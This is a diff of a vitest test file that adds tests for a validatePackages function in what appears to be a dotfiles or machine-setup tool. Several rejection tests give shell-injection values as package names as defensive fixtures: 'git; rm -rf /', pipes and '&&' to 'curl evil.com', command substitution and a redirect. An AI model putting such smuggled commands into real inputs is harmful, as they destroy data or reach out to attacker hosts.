|
1 | 1 | import { describe, it, expect } from 'vitest'; |
2 | | -import { validateCustomScript, validateDotfilesRepo, validateReturnTo } from './validation'; |
| 2 | +import { |
| 3 | + validateCustomScript, |
| 4 | + validateDotfilesRepo, |
| 5 | + validateReturnTo, |
| 6 | + validatePackages |
| 7 | +} from './validation'; |
3 | 8 |
|
4 | 9 | describe('validateCustomScript', () => { |
5 | 10 | it('should accept null or undefined', () => { |
@@ -240,3 +245,202 @@ describe('validateReturnTo', () => { |
240 | 245 | expect(validateReturnTo('/user/my-config')).toBe(true); |
241 | 246 | }); |
242 | 247 | }); |
| 248 | + |
| 249 | +describe('validatePackages', () => { |
| 250 | + it('should accept null or undefined', () => { |
| 251 | + expect(validatePackages(null).valid).toBe(true); |
| 252 | + expect(validatePackages(undefined).valid).toBe(true); |
| 253 | + }); |
| 254 | + |
| 255 | + it('should accept empty array', () => { |
| 256 | + expect(validatePackages([]).valid).toBe(true); |
| 257 | + }); |
| 258 | + |
| 259 | + it('should accept valid packages', () => { |
| 260 | + const packages = [ |
| 261 | + { name: 'git', type: 'formula', desc: 'Version control' }, |
| 262 | + { name: 'visual-studio-code', type: 'cask', desc: 'Code editor' }, |
| 263 | + { name: '@vue/cli', type: 'npm', desc: 'Vue CLI' } |
| 264 | + ]; |
| 265 | + const result = validatePackages(packages); |
| 266 | + |
| 267 | + expect(result.valid).toBe(true); |
| 268 | + expect(result.error).toBeUndefined(); |
| 269 | + }); |
| 270 | + |
| 271 | + it('should accept packages without description', () => { |
| 272 | + const packages = [ |
| 273 | + { name: 'git', type: 'formula' }, |
| 274 | + { name: 'node', type: 'formula' } |
| 275 | + ]; |
| 276 | + const result = validatePackages(packages); |
| 277 | + |
| 278 | + expect(result.valid).toBe(true); |
| 279 | + }); |
| 280 | + |
| 281 | + it('should accept scoped npm packages', () => { |
| 282 | + const packages = [ |
| 283 | + { name: '@react/core', type: 'npm' }, |
| 284 | + { name: '@babel/preset-env', type: 'npm' } |
| 285 | + ]; |
| 286 | + const result = validatePackages(packages); |
| 287 | + |
| 288 | + expect(result.valid).toBe(true); |
| 289 | + }); |
| 290 | + |
| 291 | + it('should accept packages with slashes (go modules, npm scopes)', () => { |
| 292 | + const packages = [ |
| 293 | + { name: 'github.com/user/repo', type: 'go' }, |
| 294 | + { name: '@org/package', type: 'npm' } |
| 295 | + ]; |
| 296 | + const result = validatePackages(packages); |
| 297 | + |
| 298 | + expect(result.valid).toBe(true); |
| 299 | + }); |
| 300 | + |
| 301 | + it('should reject non-array input', () => { |
| 302 | + const result = validatePackages('not an array' as any); |
| 303 | + |
| 304 | + expect(result.valid).toBe(false); |
| 305 | + expect(result.error).toContain('must be an array'); |
| 306 | + }); |
| 307 | + |
| 308 | + it('should reject more than 500 packages', () => { |
| 309 | + const packages = Array.from({ length: 501 }, (_, i) => ({ |
| 310 | + name: `pkg${i}`, |
| 311 | + type: 'formula' |
| 312 | + })); |
| 313 | + const result = validatePackages(packages); |
| 314 | + |
| 315 | + expect(result.valid).toBe(false); |
| 316 | + expect(result.error).toContain('Maximum 500 packages'); |
| 317 | + }); |
| 318 | + |
| 319 | + it('should reject non-object package entries', () => { |
| 320 | + const packages = ['git', 'node'] as any; |
| 321 | + const result = validatePackages(packages); |
| 322 | + |
| 323 | + expect(result.valid).toBe(false); |
| 324 | + expect(result.error).toContain('must be an object'); |
| 325 | + }); |
| 326 | + |
| 327 | + it('should reject packages without name', () => { |
| 328 | + const packages = [{ type: 'formula' }] as any; |
| 329 | + const result = validatePackages(packages); |
| 330 | + |
| 331 | + expect(result.valid).toBe(false); |
| 332 | + expect(result.error).toContain('must have a string name'); |
| 333 | + }); |
| 334 | + |
| 335 | + it('should reject packages with non-string name', () => { |
| 336 | + const packages = [{ name: 123, type: 'formula' }] as any; |
| 337 | + const result = validatePackages(packages); |
| 338 | + |
| 339 | + expect(result.valid).toBe(false); |
| 340 | + expect(result.error).toContain('must have a string name'); |
| 341 | + }); |
| 342 | + |
| 343 | + it('should reject package name longer than 200 characters', () => { |
| 344 | + const packages = [{ name: 'a'.repeat(201), type: 'formula' }]; |
| 345 | + const result = validatePackages(packages); |
| 346 | + |
| 347 | + expect(result.valid).toBe(false); |
| 348 | + expect(result.error).toContain('too long'); |
| 349 | + }); |
| 350 | + |
| 351 | + it('should reject invalid type', () => { |
| 352 | + const packages = [{ name: 'git', type: 'invalid' }] as any; |
| 353 | + const result = validatePackages(packages); |
| 354 | + |
| 355 | + expect(result.valid).toBe(false); |
| 356 | + expect(result.error).toContain('Invalid package type'); |
| 357 | + }); |
| 358 | + |
| 359 | + it('should reject shell injection via semicolon', () => { |
| 360 | + const packages = [{ name: 'git; rm -rf /', type: 'formula' }]; |
| 361 | + const result = validatePackages(packages); |
| 362 | + |
| 363 | + expect(result.valid).toBe(false); |
| 364 | + expect(result.error).toContain('Invalid package name'); |
| 365 | + }); |
| 366 | + |
| 367 | + it('should reject shell injection via pipe', () => { |
| 368 | + const packages = [{ name: 'git | curl evil.com', type: 'formula' }]; |
| 369 | + const result = validatePackages(packages); |
| 370 | + |
| 371 | + expect(result.valid).toBe(false); |
| 372 | + expect(result.error).toContain('Invalid package name'); |
| 373 | + }); |
| 374 | + |
| 375 | + it('should reject shell injection via backticks', () => { |
| 376 | + const packages = [{ name: 'git`whoami`', type: 'formula' }]; |
| 377 | + const result = validatePackages(packages); |
| 378 | + |
| 379 | + expect(result.valid).toBe(false); |
| 380 | + expect(result.error).toContain('Invalid package name'); |
| 381 | + }); |
| 382 | + |
| 383 | + it('should reject shell injection via dollar sign', () => { |
| 384 | + const packages = [{ name: 'git$(whoami)', type: 'formula' }]; |
| 385 | + const result = validatePackages(packages); |
| 386 | + |
| 387 | + expect(result.valid).toBe(false); |
| 388 | + expect(result.error).toContain('Invalid package name'); |
| 389 | + }); |
| 390 | + |
| 391 | + it('should reject command substitution', () => { |
| 392 | + const packages = [{ name: 'git && curl evil.com', type: 'formula' }]; |
| 393 | + const result = validatePackages(packages); |
| 394 | + |
| 395 | + expect(result.valid).toBe(false); |
| 396 | + expect(result.error).toContain('Invalid package name'); |
| 397 | + }); |
| 398 | + |
| 399 | + it('should reject redirect operators', () => { |
| 400 | + const packages = [{ name: 'git > /tmp/pwned', type: 'formula' }]; |
| 401 | + const result = validatePackages(packages); |
| 402 | + |
| 403 | + expect(result.valid).toBe(false); |
| 404 | + expect(result.error).toContain('Invalid package name'); |
| 405 | + }); |
| 406 | + |
| 407 | + it('should reject newline injection', () => { |
| 408 | + const packages = [{ name: 'git\ncurl evil.com', type: 'formula' }]; |
| 409 | + const result = validatePackages(packages); |
| 410 | + |
| 411 | + expect(result.valid).toBe(false); |
| 412 | + expect(result.error).toContain('Invalid package name'); |
| 413 | + }); |
| 414 | + |
| 415 | + it('should accept all valid package types', () => { |
| 416 | + const types = ['formula', 'cask', 'tap', 'mas', 'npm', 'pip', 'gem', 'cargo', 'go']; |
| 417 | + for (const type of types) { |
| 418 | + const packages = [{ name: 'valid-package', type }]; |
| 419 | + const result = validatePackages(packages); |
| 420 | + |
| 421 | + expect(result.valid).toBe(true); |
| 422 | + } |
| 423 | + }); |
| 424 | + |
| 425 | + it('should reject description longer than 500 characters', () => { |
| 426 | + const packages = [ |
| 427 | + { |
| 428 | + name: 'git', |
| 429 | + type: 'formula', |
| 430 | + desc: 'a'.repeat(501) |
| 431 | + } |
| 432 | + ]; |
| 433 | + const result = validatePackages(packages); |
| 434 | + |
| 435 | + expect(result.valid).toBe(false); |
| 436 | + expect(result.error).toContain('description'); |
| 437 | + }); |
| 438 | + |
| 439 | + it('should reject non-string description', () => { |
| 440 | + const packages = [{ name: 'git', type: 'formula', desc: 123 }] as any; |
| 441 | + const result = validatePackages(packages); |
| 442 | + |
| 443 | + expect(result.valid).toBe(false); |
| 444 | + expect(result.error).toContain('description'); |
| 445 | + }); |
| 446 | +}); |
0 commit comments